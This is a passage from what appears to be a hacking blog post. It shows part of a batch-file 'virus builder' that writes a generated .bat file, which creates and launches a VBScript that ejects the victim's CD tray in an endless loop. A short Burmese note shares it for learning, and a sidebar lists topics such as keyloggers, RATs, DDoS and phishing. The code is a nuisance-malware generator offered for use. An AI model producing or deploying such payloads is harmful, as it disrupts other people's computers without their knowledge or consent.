echo rem Start Opening Disk Tray >> %name%.bat
echo echo Do >> "opendisk.vbs" >> %name%.bat
echo echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs" >> %name%.bat
echo echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs" >> %name%.bat
echo echo colCDROMs.Item(d).Eject  >> "opendisk.vbs" >> %name%.bat
echo echo colCDROMs.Item(d).Eject  >> "opendisk.vbs" >> %name%.bat
echo echo Loop >> "opendisk.vbs" >> %name%.bat
echo start "" "opendisk.vbs" >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start

ရုရွားက ကၽြန္ေတာ့္ဆရာဆီကရတာပါ။
ကၽြန္ေတာ္က ျပန္မွ်ေပလိုက္တယ္။ programming သမားေတြေလ့လာေစခ်င္တယ္
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology